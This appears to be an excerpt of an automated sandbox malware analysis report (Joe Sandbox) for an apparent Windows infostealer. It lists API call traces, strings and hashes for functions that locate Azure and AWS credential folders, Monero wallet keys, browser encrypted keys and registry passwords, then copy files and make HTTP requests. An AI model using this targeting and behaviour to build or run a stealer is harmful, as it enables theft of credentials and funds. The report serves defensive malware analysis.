                                    • Instruction Fuzzy Hash: 7D81FBB1950118AFEB28DB54CC95FEEB7B8FF48700F008299E509A6180DF716B89CF95
                                    Function 00C44D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00C44DCD
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                      • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00C44E59
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                      • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                      • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C44EE5
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449B0
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C508D2), ref: 00C449C5
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449E2
                                      • Part of subcall function 00C44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C44A1E
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,019DE510), ref: 00C44A4A
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FF8), ref: 00C44A5C
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A70
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FFC), ref: 00C44A82
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A96
                                      • Part of subcall function 00C44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C44AAC
                                      • Part of subcall function 00C44910: DeleteFileA.KERNEL32(?), ref: 00C44B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 98e09673bc85d6adf9beadf9fd1df2ee052f7efbf9db2a83c02b6f88076660b9
                                    • Instruction ID: eaf8a344e1c96e3522e75e6e5296f063268d9575cc7a0b0cda1d6590d02d6bd9
                                    • Opcode Fuzzy Hash: 98e09673bc85d6adf9beadf9fd1df2ee052f7efbf9db2a83c02b6f88076660b9
                                    • Instruction Fuzzy Hash: 9D41A67A9402046BD754F7B0DC4BFED3338AB64701F044464BA49A60C1EEB49BCDDB92
                                    Function 00C49010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C4906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                    • Instruction ID: 0c4975aa578897efcbc270441f062e2a61be49fdf1c2f49e99e521e1a1946bdc
                                    • Opcode Fuzzy Hash: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                    • Instruction Fuzzy Hash: 5F71EC71910208AFDB14EFE5DC89FEEB7B8FB88700F148518F519A7290DB74A945CB61
                                    Function 00C42E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C431C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C4335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C434EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                    • Instruction ID: 7da1bb2cbfbf591d0023178cdbfae83a4c8c3167be822fdb97b8955d97e0433d
                                    • Opcode Fuzzy Hash: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                    • Instruction Fuzzy Hash: D412EC71850108AAEB19FBA0DC92FEDB778BF64300F504169F50666191EF742B8EDF62
                                    Function 00C452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                      • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36303
                                      • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                      • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C36385
                                      • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                      • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                    • lstrlen.KERNEL32(00000000), ref: 00C4532F
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                    • lstrlen.KERNEL32(00000000), ref: 00C45383
                                    • lstrlen.KERNEL32(00000000), ref: 00C453AE
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: c7138f58a3b6f6871e4f924f1b8e78b7619944f899c75e8f8590c7d5de519c0d
                                    • Instruction ID: 5a934d1938245d291ce5fb6778e6dfb960b5991a4759ebe57470fcacc67ab695
                                    • Opcode Fuzzy Hash: c7138f58a3b6f6871e4f924f1b8e78b7619944f899c75e8f8590c7d5de519c0d
                                    • Instruction Fuzzy Hash: C0510D309501489FEB18FF61CD96AED7779FF50305F504028F80A6A592EF346B4AEB62
                                    Function 00C412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 24d73d29d38f41f881eea5962ecc163b8db5653a8a7021f1d17afc3626325baf
                                    • Instruction ID: b4fc219b249cd0017c6375d005d6e06cbc1fc33c5fcf3422b20a8be202920db8
                                    • Opcode Fuzzy Hash: 24d73d29d38f41f881eea5962ecc163b8db5653a8a7021f1d17afc3626325baf
                                    • Instruction Fuzzy Hash: 80C197B59401199BCB14EF60DC89FEE7379FB94304F044598F50AA7282EA70AEC9DF91
                                    Function 00C44280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C442EC
                                    • lstrcat.KERNEL32(?,019DD988), ref: 00C4430B
                                    • lstrcat.KERNEL32(?,?), ref: 00C4431F
                                    • lstrcat.KERNEL32(?,019DC828), ref: 00C44333
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                      • Part of subcall function 00C39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                      • Part of subcall function 00C493C0: GlobalAlloc.KERNEL32(00000000,00C443DD,00C443DD), ref: 00C493D3
                                    • StrStrA.SHLWAPI(?,019DDA90), ref: 00C443F3
                                    • GlobalFree.KERNEL32(?), ref: 00C44512
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                      • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                      • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C444A3
                                    • StrCmpCA.SHLWAPI(?,00C508D1), ref: 00C444C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C444D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C444E5
                                    • lstrcat.KERNEL32(00000000,00C50FB8), ref: 00C444F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: eb2560caf3e9b138d27adda3fc475e6c29ddfb53b86c6234afd078d6e646c946
                                    • Instruction ID: 587ec6733fe922f1a37eb35f862b124b06e258ea4698c8893f9f6a62018b9bae
                                    • Opcode Fuzzy Hash: eb2560caf3e9b138d27adda3fc475e6c29ddfb53b86c6234afd078d6e646c946
                                    • Instruction Fuzzy Hash: FD712876910208ABDB14FBE0DC8AFEE7379BB88300F144598F619A7181DA74DB49DF91
                                    Function 00C31310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                      • Part of subcall function 00C312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                      • Part of subcall function 00C312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                      • Part of subcall function 00C312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                      • Part of subcall function 00C312A0: RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3134F
                                    • lstrlen.KERNEL32(?), ref: 00C3135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00C31377
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C31465
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C314EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 964117cb293ff04cb71da6b6b799e6a1de7487bdbf23b056c76899c16ba99677
                                    • Instruction ID: 1404bf979e7bdf4b3c79b85eb6a1d4a4c1eab7abe3cac0bf0de82ba1d30bda04
                                    • Opcode Fuzzy Hash: 964117cb293ff04cb71da6b6b799e6a1de7487bdbf23b056c76899c16ba99677
                                    • Instruction Fuzzy Hash: B95121B19901185BDB15FB60DD96BED737CBF54300F4045A8B60AA2082EE706B89DFA6
                                    Function 00C375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C372D0: memset.MSVCRT ref: 00C37314
                                      • Part of subcall function 00C372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                      • Part of subcall function 00C372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                      • Part of subcall function 00C372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                      • Part of subcall function 00C372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                      • Part of subcall function 00C372D0: HeapFree.KERNEL32(00000000), ref: 00C37459
                                    • lstrcat.KERNEL32(00000000,00C517FC), ref: 00C37606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C37648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00C3765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C3768F
                                    • lstrcat.KERNEL32(00000000,00C51804), ref: 00C376A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C376D3
                                    • lstrcat.KERNEL32(00000000,00C51808), ref: 00C376ED
                                    • task.LIBCPMTD ref: 00C376FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
